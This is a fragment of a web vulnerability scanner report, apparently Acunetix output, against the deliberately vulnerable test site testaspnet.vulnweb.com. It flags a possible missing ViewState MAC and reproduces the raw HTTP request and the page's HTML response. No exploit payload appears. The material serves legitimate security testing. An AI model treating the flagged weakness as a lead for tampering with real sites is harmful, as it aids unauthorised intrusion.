month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Solution Ensure the MAC is set for all pages on this website.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
Alert tags Alert description *** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request Request line and header section (342 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:18 GMT Content-Length: 22752Response body (22752 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWjL6iDQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+dfic04fJFrwdgOeBd3JBjK63E5g==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 